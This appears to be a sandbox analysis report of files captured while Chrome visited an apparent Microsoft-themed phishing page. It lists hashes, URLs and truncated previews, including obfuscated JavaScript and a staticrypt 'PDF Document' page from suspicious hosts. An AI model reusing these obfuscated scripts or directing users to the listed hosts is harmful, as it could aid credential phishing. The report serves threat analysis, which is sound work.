                            Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).axios=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}function r(e,t,r){return t&&n(e.prototype,t),r&&n(e,r),Object.defineProperty(e,"prototype",{writable:!1}),e}function o(e,t){return function(e){if(Array.isArray(e))return e}(e)||function(e,t){var n=null==e?null:"undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(nul
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:dropped
                            Size (bytes):1864
                            Entropy (8bit):5.222032823730197
                            Encrypted:false
                            SSDEEP:
                            MD5:BC3D32A696895F78C19DF6C717586A5D
                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                            Malicious:false
                            Reputation:unknown
                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                            Category:dropped
                            Size (bytes):17174
                            Entropy (8bit):2.9129715116732746
                            Encrypted:false
                            SSDEEP:
                            MD5:12E3DAC858061D088023B2BD48E2FA96
                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                            Malicious:false
                            Reputation:unknown
                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (5882), with no line terminators
                            Category:downloaded
                            Size (bytes):5882
                            Entropy (8bit):5.298763167397422
                            Encrypted:false
                            SSDEEP:
                            MD5:389439739EFEE7911142B0B6678792BF
                            SHA1:E261E324124E3F81B787B9D4C57EF36998333B4B
                            SHA-256:13E4E0705745C6F333D350690457E3903F24D0809E75CF10A658BE3A1E8CA4D6
                            SHA-512:78BBB5557C65F82DD58607BBF962D2891B39C4180A892F31C1D4718584BC35400592AF2414477CC9B8DE8CAB5EF6776A388D99CD8759DDE94E1B0482B445F2F5
                            Malicious:false
                            Reputation:unknown
                            URL:https://bespoke.global-constructions.ca/js2_/67168ea5e8b89-9d7acd36bcda926e6106a0741706a8c1
                            Preview:const a0_0x51e51a=a0_0x1fd5;function a0_0x1fd5(_0x5ed4ce,_0x323b12){const _0x449c60=a0_0x170e();return a0_0x1fd5=function(_0x1c90f2,_0xe6754e){_0x1c90f2=_0x1c90f2-0x12b;let _0x43dea8=_0x449c60[_0x1c90f2];return _0x43dea8;},a0_0x1fd5(_0x5ed4ce,_0x323b12);}(function(_0x5e5dd7,_0x3ce260){const _0x79d1d=a0_0x1fd5,_0x48dbdc=_0x5e5dd7();while(!![]){try{const _0x2e7c45=parseInt(_0x79d1d(0x12c))/0x1+-parseInt(_0x79d1d(0x152))/0x2+-parseInt(_0x79d1d(0x12b))/0x3*(-parseInt(_0x79d1d(0x14b))/0x4)+parseInt(_0x79d1d(0x143))/0x5+-parseInt(_0x79d1d(0x12f))/0x6*(parseInt(_0x79d1d(0x132))/0x7)+-parseInt(_0x79d1d(0x15e))/0x8+-parseInt(_0x79d1d(0x153))/0x9*(-parseInt(_0x79d1d(0x138))/0xa);if(_0x2e7c45===_0x3ce260)break;else _0x48dbdc['push'](_0x48dbdc['shift']());}catch(_0xad16be){_0x48dbdc['push'](_0x48dbdc['shift']());}}}(a0_0x170e,0x2ff22));const a0_0x4712f3=(function(){let _0x1cb6ac=!![];return function(_0x51d28b,_0x4c7e40){const _0x5b8a58=_0x1cb6ac?function(){const _0x424901=a0_0x1fd5;if(_0x4c7e40){c
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:dropped
                            Size (bytes):3202
                            Entropy (8bit):4.236796532981122
                            Encrypted:false
                            SSDEEP:
                            MD5:7D2B8F25545A2894E2721E9FE528E34C
                            SHA1:D0DAE76F4BF5C04ACD5FCDF1BCB12908099E328C
                            SHA-256:797BDA35D13E5130FE5A14E0069C31B46EC1AF6EA47F2D300309803BB4D2608C
                            SHA-512:FE1F84AF0BA1100B2A90EE6FBFBD3763EF34D1A3BF045345538302ECE7D37EAADC9A9CD0E09C2030E62B13A55E118A2417B27F14336C271758BFB3E256906385
                            Malicious:false
                            Reputation:unknown
                            Preview:<svg id="MSLogo" width="99" height="22" xmlns="http://www.w3.org/2000/svg">..<g fill="none" fill-rule="evenodd">..<path fill="#737474"..d="m34.64 12.07-.58 1.65h-.04c-.1-.39-.28-.93-.56-1.63l-3.14-7.9h-3.08v12.56h2.03V9.03l-.03-1.7c-.01-.34-.05-.6-.06-.81h.05c.1.47.2.83.28 1.07l3.78 9.16h1.42l3.75-9.24c.08-.21.17-.62.25-1h.05c-.05.92-.1 1.76-.1 2.26v7.98h2.17V4.2h-2.96l-3.23 7.88z"../>..<path d="M0 20.96h98.15V0H0z" />..<path fill="#737474"..d="M42.87 16.75h2.11v-9h-2.11zm1.08-12.82c-.35 0-.66.12-.9.35a1.17 1.17 0 0 0-.38.88c0 .35.12.64.37.87.25.23.55.34.9.34s.67-.11.92-.34c.25-.23.38-.52.38-.86 0-.34-.13-.64-.37-.88a1.26 1.26 0 0 0-.92-.36m8.53 3.73a5.9 5.9 0 0 0-1.19-.12c-.97 0-1.83.2-2.57.62-.74.4-1.3 1-1.7 1.74a5.57 5.57 0 0 0-.01 4.9c.37.7.9 1.23 1.58 1.6.67.38 1.45.57 2.31.57 1.01 0 1.87-.2 2.56-.6l.03-.02v-1.94l-.1.07c-.3.23-.65.4-1.03.54a3.12 3.12 0 0 1-1.01.2c-.83 0-1.5-.26-1.98-.78a3 3 0 0 1-.73-2.14c0-.9.25-1.65.76-2.2a2.6 2.6 0 0 1 1.98-.81c.7 0 1.38.23 2.02.7l.09.06V8.01L5
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:downloaded
                            Size (bytes):3651
                            Entropy (8bit):4.094801914706141
                            Encrypted:false
                            SSDEEP:
                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                            Malicious:false
                            Reputation:unknown
                            URL:https://bespoke.global-constructions.ca/logo_/d4700c86a24a9804ae366f207a909bb967168e92bae6f
                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (47459)
                            Category:dropped
                            Size (bytes):47460
                            Entropy (8bit):5.397735966179774
                            Encrypted:false
                            SSDEEP:
                            MD5:5D332FD1AE9FEB79A10425DFC3F84FE4
                            SHA1:C7D7F9D2BF5EE08E242765803CDD3A223FE1CBFC
                            SHA-256:2EA786910282DF7AE154A0011375CD1254ADBD8EF0E75EB62177ADA67DAF9611
                            SHA-512:01CDAC8103290B0FC1BF9BE8EE3923BFA6B8AD7778FF6B4716E421D6BBB3382240D9316B9994D6F4EA87E67DA9791EB8E3E2A1AAF81DBD749B3C8D7778E15F20
                            Malicious:false
                            Reputation:unknown
                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(p){Wt(l,o,c,h,f,"next",p)}function f(p){Wt(l,o,c,h,f,"throw",p)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (6817), with no line terminators
                            Category:downloaded
                            Size (bytes):6817
                            Entropy (8bit):5.329352579227845
                            Encrypted:false
                            SSDEEP:
                            MD5:B8DB3DB3022C1133E898E28A129563D6
                            SHA1:F56585C4D90C03228315FFBAA1483B18715924B6
                            SHA-256:48A1486DE2AE62E22452E847A5A07459CC36BF532C3A637BF7D5FA58EF663DAA
                            SHA-512:5923717382F551503AF1D999B320D6F9000E557E0FA770649864247E36E148A11665357AF119EEFF5B10F915D83803BE24B9D95381469781B1A5F7B849D3A5D4
                            Malicious:false
                            Reputation:unknown
                            URL:https://bespoke.global-constructions.ca/js_/67168e8eb4a8b-0c7374a2dbe5f3544d97874beae753c6
                            Preview:const a0_0x709fd6=a0_0x1aca;(function(_0x3012d7,_0x4b2b16){const _0x201649=a0_0x1aca,_0x1b3873=_0x3012d7();while(!![]){try{const _0x573aaa=-parseInt(_0x201649(0x13d))/0x1*(-parseInt(_0x201649(0x121))/0x2)+parseInt(_0x201649(0x145))/0x3*(-parseInt(_0x201649(0x14e))/0x4)+parseInt(_0x201649(0x120))/0x5*(parseInt(_0x201649(0x141))/0x6)+parseInt(_0x201649(0x154))/0x7*(-parseInt(_0x201649(0x152))/0x8)+parseInt(_0x201649(0x12d))/0x9*(-parseInt(_0x201649(0x13c))/0xa)+-parseInt(_0x201649(0x11e))/0xb+parseInt(_0x201649(0x144))/0xc;if(_0x573aaa===_0x4b2b16)break;else _0x1b3873['push'](_0x1b3873['shift']());}catch(_0x1eb3ea){_0x1b3873['push'](_0x1b3873['shift']());}}}(a0_0x39f3,0x8b036));const a0_0x39d23c=(function(){let _0x1d873b=!![];return function(_0x4021d6,_0x160b18){const _0x3fae92=_0x1d873b?function(){const _0x3593dc=a0_0x1aca;if(_0x160b18){const _0x1454cc=_0x160b18[_0x3593dc(0x147)](_0x4021d6,arguments);return _0x160b18=null,_0x1454cc;}}:function(){};return _0x1d873b=![],_0x3fae92;};}()),a
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:dropped
                            Size (bytes):513
                            Entropy (8bit):4.720499940334011
                            Encrypted:false
                            SSDEEP:
                            MD5:A9CC2824EF3517B6C4160DCF8FF7D410
                            SHA1:8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
                            SHA-256:34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
                            SHA-512:AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
                            Malicious:false
                            Reputation:unknown
                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 97 x 76, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.022997040570905
                            Encrypted:false
                            SSDEEP:
                            MD5:ED02B3BB0DC94C9187A568338245A8D3
                            SHA1:7CC706FE582C3F45FEF08338D3AFB1084C725D87
                            SHA-256:B80B16CF781FF4691321FE6C9FEC8F38C5B9A60696E14031DDC72D6946F97C6D
                            SHA-512:DCA13C6825C15CC83A3DC1A766043F8F36CD17CD01753D4CFFF818C26153B996F97A6D0B53BA27448A6FB303E14AB4912868B165AF8DFE020A653BB28780878B
                            Malicious:false
                            Reputation:unknown
                            Preview:.PNG........IHDR...a...L......VN.....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:downloaded
                            Size (bytes):548
                            Entropy (8bit):4.688532577858027
                            Encrypted:false
                            SSDEEP:
                            MD5:370E16C3B7DBA286CFF055F93B9A94D8
                            SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                            SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                            SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                            Malicious:false
                            Reputation:unknown
                            URL:https://p4enterprises.com/favicon.ico
                            Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with no line terminators
                            Category:downloaded
                            Size (bytes):16
                            Entropy (8bit):3.875
                            Encrypted:false
                            SSDEEP:
                            MD5:011B17B116126E6E0C4A9B0DE9145805
                            SHA1:DF63A6EB731FFCE96F79802EFF6D53D00CDA42BC
                            SHA-256:3418E6E704387A99F1611EB7BB883328A438BA600971E6D692E8BEA60F10B179
                            SHA-512:BB432E96AF588E0B19CBD8BC228C87989FE578167FD1F3831C7E50D2D86DE11016FB93679FEF189B39085E9151EB9A6EB2986155C65DD0FE95EC85454D32AE7D
                            Malicious:false
                            Reputation:unknown
                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl4jLUtb01hYBIFDdFbUVI=?alt=proto
                            Preview:CgkKBw3RW1FSGgA=
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 20 x 99, 8-bit/color RGB, non-interlaced
                            Category:downloaded
                            Size (bytes):61
                            Entropy (8bit):4.035372245524405
                            Encrypted:false
                            SSDEEP:
                            MD5:C40CD5A7EF76E781F849445CE875DEED
                            SHA1:7254EFC749638125A0D0A9504F94133E7CF8A467
                            SHA-256:20D7E7510261A58B61833828B6E75DD4B17A54D4F58AD5C63DEF9667D8A4E130
                            SHA-512:DC6774CA130540E845905217520DED0670FBFCAF9B1D8F78618050113822366ADD9A5B66A78952A5B39AF81EDC54F636F7DF08E2B5E4E583282F219C88EEEEBE
                            Malicious:false
                            Reputation:unknown
                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d62f2649a2942d4/1729531527805/gi1te_yrqOlnXld
                            Preview:.PNG........IHDR.......c.......#....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:downloaded
                            Size (bytes):105456
                            Entropy (8bit):5.227044897009775
                            Encrypted:false
                            SSDEEP:
                            MD5:4C674D8D4294C4A6B763AA1FC836827C
                            SHA1:88DEC91B36CAD6555FB73B9ED28D6FDC7A944467
                            SHA-256:99855F2433E80A925CE4CABD975E2DD7A9FE01FAB8E164B26F67010FF5769EC0
                            SHA-512:80B73385D21512B2FD10690F08EE99B6FD2D1123920ABACF7A864841F07F817EE1BCC5C466ACC27209A094E31D334E4532AE7EFE7F2F7D7427E67CC567F20733
                            Malicious:false
                            Reputation:unknown
                            URL:https://bespoke.global-constructions.ca/css_/Bs36DsugI9NRl0e
                            Preview:html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:dropped
                            Size (bytes):1592
                            Entropy (8bit):4.205005284721148
                            Encrypted:false
                            SSDEEP:
                            MD5:4E48046CE74F4B89D45037C90576BFAC
                            SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                            SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                            SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                            Malicious:false
                            Reputation:unknown
                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (2208)
                            Category:downloaded
                            Size (bytes):37308
                            Entropy (8bit):5.065154995074999
                            Encrypted:false
                            SSDEEP:
                            MD5:6EAFD1E3A47AF0BC2B047EFCB2A18A29
                            SHA1:FA2D7FE06A0BCB8279A9D8A26AD9C6D53E284F7E
                            SHA-256:84DBB42B143613BE0D3CBFEF12539234447F04686D27BF7E9947B96296B9A4D4
                            SHA-512:4EFD595DCC0322123BAB161AE27BCC88B76C3D272E43E852DB8647C4407F75B5089BAAF50ACE9A29A18A2D8436ACE35133474A6A33B33AE8BD2C599C5A1512CB
                            Malicious:false
                            Reputation:unknown
                            URL:https://p4enterprises.com/yyhu.html
                            Preview:<!DOCTYPE html>.<html class="staticrypt-html">. <head>. <meta charset="utf-8" />. <title>PDF Document</title>. <meta name="viewport" content="width=device-width, initial-scale=1" />.. do not cache this page -->. <meta http-equiv="cache-control" content="max-age=0" />. <meta http-equiv="cache-control" content="no-cache" />. <meta http-equiv="expires" content="0" />. <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />. <meta http-equiv="pragma" content="no-cache" />.. <style>. .staticrypt-hr {. margin-top: 20px;. margin-bottom: 20px;. border: 0;. border-top: 1px solid #eee;. }.. .staticrypt-page {. width: 360px;. padding: 8% 0 0;. margin: auto;. box-sizing: border-box;. }.. .staticrypt-form {. position: rela
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65447)
                            Category:downloaded
                            Size (bytes):89501
                            Entropy (8bit):5.289893677458563
                            Encrypted:false
                            SSDEEP:
                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                            Malicious:false
                            Reputation:unknown
                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):3.990210155325004
                            Encrypted:false
                            SSDEEP:
                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                            Malicious:false
                            Reputation:unknown
                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (32065)
                            Category:dropped
                            Size (bytes):85578
                            Entropy (8bit):5.366055229017455
                            Encrypted:false
                            SSDEEP:
                            MD5:2F6B11A7E914718E0290410E85366FE9
                            SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                            SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                            SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                            Malicious:false
                            Reputation:unknown
                            Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text
                            Category:downloaded
                            Size (bytes):315
                            Entropy (8bit):5.0572271090563765
                            Encrypted:false
                            SSDEEP:
                            MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                            SHA1:A82190FC530C265AA40A045C21770D967F4767B8
